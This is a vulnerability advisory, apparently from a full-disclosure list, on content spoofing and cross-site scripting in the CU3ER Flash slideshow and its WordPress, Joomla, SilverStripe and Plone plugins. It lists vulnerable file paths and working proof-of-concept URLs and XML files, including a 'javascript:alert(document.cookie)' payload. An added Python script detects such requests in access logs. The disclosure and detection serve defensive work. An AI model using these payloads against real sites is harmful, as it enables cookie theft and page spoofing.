Hello 3APA3A!
Recently I disclosed vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244). This is a popular Flash file, and Google's index contains up to a million web sites with it (inurl:cu3er.swf filetype:swf - Google now shows 994000 results).
There are plugins for different CMSs that include CU3ER. The Content Spoofing and Cross-Site Scripting vulnerabilities affect the CU3ER plugins for WordPress, Joomla, SilverStripe and Plone: wpCU3ER for WordPress, jCU3ER and Vinaora Cu3er 3D Slide-show for Joomla, cu3er-silverstripe-extension for SilverStripe, and collective.cu3er for Plone.
Vulnerable are all plugins with flash file of CU3ER.
Vulnerable are wpCU3ER 0.75 and previous versions.
Vulnerable are jCU3ER 0.12 and previous versions.
Vulnerable are Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1 and previous versions.
Vulnerable are all versions of cu3er-silverstripe-extension.
Vulnerable are collective.cu3er 0.1 and previous versions.
MADEBYPLAY (wpCU3ER and jCU3ER)
http://getcu3er.com
Vinaora
http://code.google.com/p/vinaora-3d-slideshow
Matt Clegg
http://www.silverstripe.org/cu3er-silverstripe-extension-module
Thomas Massmann
https://pypi.python.org/pypi/collective.cu3er/0.1
Path to flash-file in different plugins:
http://site/wp-content/uploads/wpcu3er/CU3ER.swf
In old versions of the plugin:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf
http://site/components/com_cu3er/flash/CU3ER.swf
http://site/media/mod_vinaora_cu3er/flash/cu3er.swf
http://site/cu3er-silverstripe-extension/flash/cu3er.swf
http://site/collective/cu3er/browser/flash/cu3er.swf
The first two plugins use the latest version of CU3ER; the other three use version 0.9.2 (as do old versions of wp-cu3er).
Content Spoofing (Content Injection) (WASC-12):
http://site/cu3er.swf?xml=http://site2/1.xml
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>
Cross-Site Scripting (WASC-08):
http://site/cu3er.swf?xml=http://site2/xss.xml
File xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>
Cross-domain attacks require a crossdomain.xml on the web site that hosts the XML files.
These are examples of CS and XSS attacks on CU3ER version 0.9.2. The latest version, 1.24, needs different XML files, and a different parameter is passed to the Flash file.
Content Spoofing (WASC-12):
http://site/cu3er.swf?xml_location=http://site2/1.xml
File 1.xml:
<data>
<project_settings>
<width>800</width>
<height>600</height>
</project_settings>
<settings>
<folder_images>/</folder_images>
<start_slide>1</start_slide>
<auto_play>true</auto_play>
<randomize_slides>false</randomize_slides>
<pause_on_rollover>true</pause_on_rollover>
</settings>
<preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
</preloader>
<controls>
<prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="15,0,0,15">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</prev_button>
<next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="0,15,15,0">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
<tweenOver tint="0xffffff" alpha="0.9"/>
<tweenHide tint="0xffffff" alpha="0"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</next_button>
</controls>
<defaults>
<slide time="5" color="0x000000">
<image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
<link>http://websecurity.com.ua</link>
</slide>
</defaults>
<slides>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
<transition rows="3" columns="5"/>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
</slides>
</data>
Cross-Site Scripting (WASC-08):
http://site/cu3er.swf?xml_location=http://site2/xss.xml
File xss.xml:
<data>
<project_settings>
<width>800</width>
<height>600</height>
</project_settings>
<settings>
<folder_images>/</folder_images>
<start_slide>1</start_slide>
<auto_play>true</auto_play>
<randomize_slides>false</randomize_slides>
<pause_on_rollover>true</pause_on_rollover>
</settings>
<preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
</preloader>
<controls>
<prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="15,0,0,15">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</prev_button>
<next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="0,15,15,0">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
<tweenOver tint="0xffffff" alpha="0.9"/>
<tweenHide tint="0xffffff" alpha="0"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</next_button>
</controls>
<defaults>
<slide time="5" color="0x000000">
<image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
<link>javascript:alert(document.cookie)</link>
</slide>
</defaults>
<slides>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
<transition rows="3" columns="5"/>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
</slides>
</data>
2013.11.22 - announced on my site about CU3ER.
2013.11.26 - informed the developer.
2013.11.26 - announced on my site about the plugins. Later informed the developers of the plugins.
2014.04.18 - disclosed on my site (http://websecurity.com.ua/6893/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
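
Added example, not part of the original advisory: a log check for the request pattern described above, where cu3er.swf is given an "xml" (0.9.2) or "xml_location" (1.24) parameter that points at another host. The host names, addresses and log lines are constructed for illustration, and the combined log format is an assumption.

```python
from urllib.parse import urlsplit, parse_qs

# Query parameters named in the advisory: "xml" (CU3ER 0.9.2) and
# "xml_location" (CU3ER 1.24).
CONFIG_PARAMS = ("xml", "xml_location")

def external_config_host(request_target, site_hosts):
    """Return the foreign host a cu3er.swf request loads its XML from, else None."""
    parts = urlsplit(request_target)
    # Matches the plugin paths listed in the advisory (CU3ER.swf / cu3er.swf);
    # a renamed copy of the file would not be caught by this check.
    if not parts.path.lower().endswith("/cu3er.swf"):
        return None
    # parse_qs percent-decodes values, so encoded URLs are compared in clear.
    query = parse_qs(parts.query, keep_blank_values=True)
    for name in CONFIG_PARAMS:
        for value in query.get(name, []):
            try:
                host = (urlsplit(value.strip()).hostname or "").lower()
            except ValueError:
                return "<unparseable>"      # malformed URL: report it anyway
            # Relative paths have no host; absolute and //host URLs do.
            if host and host not in site_hosts:
                return host
    return None

def scan_access_log(lines, site_hosts):
    """Return [(client_ip, foreign_host)] for requests that load off-site XML."""
    hits = []
    for line in lines:
        try:
            client_ip = line.split(" ", 1)[0]
            target = line.split('"')[1].split(" ")[1]   # "GET <target> HTTP/1.1"
        except IndexError:
            continue                                    # malformed line, skip
        host = external_config_host(target, site_hosts)
        if host:
            hits.append((client_ip, host))
    return hits

# Constructed sample lines (documentation addresses, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Apr/2014:10:00:00 +0000] "GET /wp-content/uploads/wpcu3er/CU3ER.swf?xml_location=/wp-content/uploads/wpcu3er/config.xml HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Apr/2014:10:00:05 +0000] "GET /media/mod_vinaora_cu3er/flash/cu3er.swf?xml=http%3A%2F%2Fsite2.example%2Fxss.xml HTTP/1.1" 200 5120',
    '198.51.100.8 - - [18/Apr/2014:10:00:09 +0000] "GET /components/com_cu3er/flash/CU3ER.swf?xml_location=//site2.example/1.xml HTTP/1.1" 200 5120',
    '192.0.2.11 - - [18/Apr/2014:10:00:12 +0000] "GET /index.php?xml=http://site2.example/1.xml HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, host in scan_access_log(SAMPLE_LOG, {"site.example"}):
        print(f"{ip} requested cu3er.swf with XML from {host}")
```

Only requests that name a host outside `site_hosts` are reported; a relative configuration path, as a normal plugin embed would use, is not.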